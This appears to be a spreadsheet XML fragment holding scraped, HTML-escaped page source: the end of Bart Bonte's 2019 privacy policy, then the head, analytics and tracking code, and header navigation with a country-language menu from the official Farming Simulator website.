&lt;br&gt;&lt;br&gt;
If you have any questions about this Privacy Policy please contact me at bontegames@gmail.com
&lt;br&gt;&lt;br&gt;
Bart Bonte
&lt;br&gt;
&lt;a href="https://bartbonte.com"&gt;bartbonte.com&lt;/a&gt;
&lt;br&gt;
March 2019
&lt;br&gt;&lt;br&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html class="no-js" lang="en"&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;meta charset="utf-8"&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width"&gt;_x005F_x000D_
    &lt;meta name="description" content="Welcome to the official website of Farming Simulator, the #1 farming simulation game by GIANTS Software. "&gt;_x005F_x000D_
    &lt;meta name="keywords" content="farming simulator, landwirtschafts simulator, farming, landwirtschafts, landwirtschaft, game, app, pc, mac, ps4, xbox one, nintendo switch, vita, nintendo 3ds, iPhone, iPad, android, kindle, agriculture, windows phone, multiplayer, mods, giants software"&gt;_x005F_x000D_
        &lt;meta property="og:title" content="Official Website | Farming Simulator"&gt;_x005F_x000D_
    &lt;meta property="og:type" content="website"&gt;_x005F_x000D_
    &lt;meta property="og:image" content="https://farming-simulator.com/img/content/facebookOG/og_base.jpg"&gt;_x005F_x000D_
    &lt;meta property="og:url" content="https://farming-simulator.com/privacyPolicy.php"&gt;_x005F_x000D_
    &lt;meta property="og:description" content="Official Website | Farming Simulator"&gt;_x005F_x000D_
     &lt;meta name="apple-itunes-app" content="app-id=1478611992" /&gt;_x005F_x000D_
_x005F_x000D_
    &lt;link rel="shortcut icon" href="img/page/favicon.ico" type="image/x-icon"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" href="img/page/apple-touch/apple-touch-icon.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="57x57" href="img/page/apple-touch/apple-touch-icon-57x57.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="72x72" href="img/page/apple-touch/apple-touch-icon-72x72.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="76x76" href="img/page/apple-touch/apple-touch-icon-76x76.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="114x114" href="img/page/apple-touch/apple-touch-icon-114x114.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="120x120" href="img/page/apple-touch/apple-touch-icon-120x120.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="144x144" href="img/page/apple-touch/apple-touch-icon-144x144.png"&gt;_x005F_x000D_
    &lt;link rel="apple-touch-icon" sizes="152x152" href="img/page/apple-touch/apple-touch-icon-152x152.png"&gt;_x005F_x000D_
    &lt;title&gt;Official Website | Farming Simulator&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
    &lt;link rel="stylesheet" href="css/coreui-icons-brand.min.css" async="true"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="css/icofont.min.css" async="true"&gt;_x005F_x000D_
    &lt;link rel="stylesheet" href="css/main.css?v=62" async="true"&gt;_x005F_x000D_
_x005F_x000D_
    _</t>
  </si>
  <si>
    <t>x000D_
    &lt;script type="text/javascript"&gt;_x005F_x000D_
        var _ gaq = _gaq ||</t>
  </si>
  <si>
    <t>[];_x005F_x000D_
        _gaq.push(['_setAccount', 'UA-35563174-1']);_x005F_x000D_
        _gaq.push(['_setDomainName', 'farming-simulator.com']);_x005F_x000D_
        /* _gaq.push(['_setAllowLinker', true]); */_x005F_x000D_
        _gaq.push (['_gat._anonymizeIp']);_x005F_x000D_
        _gaq.push(['_trackPageview']);_x005F_x000D_
_x005F_x000D_
        (function() {_x005F_x000D_
            var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;_x005F_x000D_
            ga.src = ('https:' == document.location.protocol ?</t>
  </si>
  <si>
    <t>' https://ssl' : 'http://www') + '.google-analytics.com/ga.js';_x005F_x000D_
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);_x005F_x000D_
        })();_x005F_x000D_
    &lt;/script&gt;_x005F_x000D_
_x005F_x000D_
    &lt;/head&gt;_x005F_x000D_
&lt;body&gt;&lt;div class="white-bg clearfix"&gt;_x005F_x000D_
    &lt;div id="fb-root"&gt;&lt;/div&gt;_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>Amazon Marketing Campaign - Tracking Pixel --&gt;_x005F_x000D_
	&lt;!-- Use of this pixel is subject to the Amazon ad specs and policies at http://www.amazon.com/b/?&amp;node=7253015011 --&gt;_x005F_x000D_
	&lt;img height='1' width='1' border='0' alt='' src='https://s.amazon-adsystem.com/iui3?d=forester-did&amp;ex-fargs=%3Fid%3D7c25fdd2-381b-1e28-da46-896c5bea5f73%26type%3D55%26m%3D1&amp;ex-fch=416613&amp;ex-src=https://www.farming-simulator.com/&amp;ex-hargs=v%3D1.0%3Bc%3D5885747817089%3Bp%3D7C25FDD2-381B-1E28-DA46-896C5BEA5F73' style="position: absolute; opacity: 0;" /&gt;_x005F_x000D_
	&lt;img height='1' width='1' border='0' alt='' src='https://aax-eu.amazon-adsystem.com/s/iui3?d=forester-did&amp;ex-fargs=%3Fid%3D8a82eb70-eebc-9106-0d6c-4b16225e2d3a%26type%3D55%26m%3D5&amp;ex-fch=416613&amp;ex-src=https://farming-simulator.com/store&amp;ex-hargs=v%3D1.0%3Bc%3D9807649490602%3Bp%3D8A82EB70-EEBC-9106-0D6C-4B16225E2D3A' style="position: absolute; opacity: 0;" /&gt;_x005F_x000D_
	&lt;!-- End of: Amazon Marketing Campaign - Tracking Pixel --&gt;_x005F_x000D_
    &lt;!--Start</t>
  </si>
  <si>
    <t xml:space="preserve">header--&gt;_x005F_x000D_
    &lt;!-- header. Header start --&gt;_x005F_x000D_
    &lt;header class="main-header" role="banner" data-module="sticky"&gt;_x005F_x000D_
        &lt;div class="header-bar clearfix"&gt;_x005F_x000D_
            &lt;div class="row column"&gt;_x005F_x000D_
_x005F_x000D_
                &lt;div class="top-bar-left"&gt;_x005F_x000D_
                    &lt;ul class="menu float-left"&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="https://giants.4u2play.de/shop/en/Merchandise/" target="_blank"&gt;_x005F_x000D_
                                Merch-Shop                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="https://eshop.giants-software.com/downloads.php" target="_blank"&gt;Downloads&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="https://forum.giants-software.com/viewforum.php?f=478" target="_newFSForum"&gt;Forum&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="updates.php?lang=en&amp;country=us"&gt;Updates&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="support.php?lang=en&amp;country=us"&gt;Support&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="https://www.giants-software.com/" target="_blank"&gt;Company&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a href="https://www.giants-software.com/jobs.php" target="_blank"&gt;Jobs&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;div class="top-bar-right"&gt;_x005F_x000D_
                    &lt;ul class="menu float-left"&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newTwitter" href="https://twitter.com/farmingsim"&gt;_x005F_x000D_
                                 &lt;i class="icon cib-twitter"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newFacebook" href="https://www.facebook.com/giants.farming.simulator"&gt;_x005F_x000D_
                                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;i class="icon cib-facebook"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newYoutube" href="https://www.youtube.com/giantssoftware?sub_confirmation=1"&gt;_x005F_x000D_
                                 &lt;i class="icon cib-youtube"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                             &lt;a target="_newInstagram" href="https://www.instagram.com/farmingsimulator/"&gt;_x005F_x000D_
                                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;i class="icon cib-instagram"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newTwitch" href="https://www.twitch.tv/giantssoftware"&gt;_x005F_x000D_
                                 &lt;i class="icon cib-twitch"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newDiscord" href="https://discord.gg/giantssoftware"&gt;_x005F_x000D_
                                 &lt;i class="icon cib-discord"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a target="_newTiktok" href="https://www.tiktok.com/@farmingsimulator"&gt;_x005F_x000D_
                                </t>
  </si>
  <si>
    <t>&lt;i class="icon cib-tiktok"&gt;&lt;/i&gt;_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                                         &lt;ul class="dropdown menu float-right"&gt;_x005F_x000D_
                        &lt;li class="is-dropdown-submenu-parent is-down-arrow menu-flags"&gt;_x005F_x000D_
                            &lt;a href="#"&gt;_x005F_x000D_
                                &lt;img src="img/page/country_flags/us.png" alt="lang"&gt;&lt;/a&gt;_x005F_x000D_
                            &lt;ul class="menu submenu is-dropdown-submenu first-sub vertical"&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=au"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=au"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/au.png" alt="Australia"&gt;&lt;span class="country"&gt;Australia&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=de&amp;amp;country=be"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=de&amp;country=be"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/be.png" alt="Belgien"&gt;&lt;span class="country"&gt;Belgien&lt;/span&gt; &lt;span&gt;(de)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=fr&amp;amp;country=be"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=fr&amp;country=be"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/be.png" alt="Belgique"&gt;&lt;span class="country"&gt;Belgique&lt;/span&gt; &lt;span&gt;(fr)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=be"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=be"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/be.png" alt="België"&gt;&lt;span class="country"&gt;België&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ca"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=ca"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ca.png" alt="Canada"&gt;&lt;span class="country"&gt;Canada&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=fr&amp;amp;country=ca"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=fr&amp;country=ca"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ca.png" alt="Canada"&gt;&lt;span class="country"&gt;Canada&lt;/span&gt; &lt;span&gt;(fr)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=cz"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=cz"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/cz.png" alt="Česko"&gt;&lt;span class="country"&gt;Česko&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=cl"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=cl"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/cl.png" alt="Chile"&gt;&lt;span class="country"&gt;Chile&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=dk"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=dk"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/dk.png" alt="Danmark"&gt;&lt;span class="country"&gt;Danmark&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=de&amp;amp;country=de"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=de&amp;country=de"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/de.png" alt="Deutschland"&gt;&lt;span class="country"&gt;Deutschland&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;span&gt;(de)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=es"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=es"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/es.png" alt="España"&gt;&lt;span class="country"&gt;España&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=fr&amp;amp;country=fr"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=fr&amp;country=fr"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/fr.png" alt="France"&gt;&lt;span class="country"&gt;France&lt;/span&gt; &lt;span&gt;(fr)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=hr"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=hr"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/hr.png" alt="Hrvatska"&gt;&lt;span class="country"&gt;Hrvatska&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ie"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=ie"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ie.png" alt="Ireland"&gt;&lt;span class="country"&gt;Ireland&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=it"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=it"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/it.png" alt="Italia"&gt;&lt;span class="country"&gt;Italia&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=hu"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=hu"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/hu.png" alt="Magyarország"&gt;&lt;span class="country"&gt;Magyarország&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=nl"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=nl"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/nl.png" alt="Nederland"&gt;&lt;span class="country"&gt;Nederland&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                 &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=no"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=no"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/no.png" alt="Norge"&gt;&lt;span class="country"&gt;Norge&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=de&amp;amp;country=at"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=de&amp;country=at"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/at.png" alt="Österreich"&gt;&lt;span class="country"&gt;Österreich&lt;/span&gt; &lt;span&gt;(de)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=pl&amp;amp;country=pl"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=pl&amp;country=pl"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/pl.png" alt="Polska"&gt;&lt;span class="country"&gt;Polska&lt;/span&gt; &lt;span&gt;(pl)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=pt"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=pt"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/pt.png" alt="Portugal"&gt;&lt;span class="country"&gt;Portugal&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ro"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=ro"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ro.png" alt="România"&gt;&lt;span class="country"&gt;România&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=de&amp;amp;country=ch"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=de&amp;country=ch"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ch.png" alt="Schweiz"&gt;&lt;span class="country"&gt;Schweiz&lt;/span&gt; &lt;span&gt;(de)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=si"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=si"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/si.png" alt="Slovenija"&gt;&lt;span class="country"&gt;Slovenija&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=sk"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=sk"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/sk.png" alt="Slovensko"&gt;&lt;span class="country"&gt;Slovensko&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=za"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=za"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/za.png" alt="South</t>
  </si>
  <si>
    <t>Africa"&gt;&lt;span class="country"&gt;South Africa&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=rs"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=rs"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/rs.png" alt="Srbija"&gt;&lt;span class="country"&gt;Srbija&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=fr&amp;amp;country=ch"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=fr&amp;country=ch"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ch.png" alt="Suisse"&gt;&lt;span class="country"&gt;Suisse&lt;/span&gt; &lt;span&gt;(fr)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=fi"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=fi"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/fi.png" alt="Suomi"&gt;&lt;span class="country"&gt;Suomi&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=se"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=se"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/se.png" alt="Sverige"&gt;&lt;span class="country"&gt;Sverige&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ch"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t>href="?lang=en&amp;country=ch"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ch.png" alt="Svizzera"&gt;&lt;span class="country"&gt;Svizzera&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=gb"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=gb"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/gb.png" alt="United Kingdom"&gt;&lt;span class="country"&gt;United Kingdom&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=us"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=us"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/us.png" alt="United States"&gt;&lt;span class="country"&gt;United States&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ru"&gt;_x005F_x000D_
                                    &lt;!--a</t>
  </si>
  <si>
    <t xml:space="preserve">href="?lang=en&amp;country=ru"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ru.png" alt="Россия"&gt;&lt;span class="country"&gt;Россия&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=ua"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=ua"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/ua.png" alt="Україна"&gt;&lt;span class="country"&gt;Україна&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                &lt;/li&gt;_x005F_x000D_
                                                            &lt;li&gt;_x005F_x000D_
                                    &lt;a href="?lang=en&amp;amp;country=jp"&gt;_x005F_x000D_
                                    &lt;!--a href="?lang=en&amp;country=jp"--&gt;_x005F_x000D_
                                        &lt;img style="border:1px solid #000;" src="img/page/country_flags/jp.png" alt="日本"&gt;&lt;span class="country"&gt;日本&lt;/span&gt; &lt;span&gt;(en)&lt;/span&gt;_x005F_x000D_
                                    &lt;/a&gt;_x005F_x000D_
                                </t>
  </si>
  <si>
    <t>&lt;/li&gt;_x005F_x000D_
                                                        &lt;/ul&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
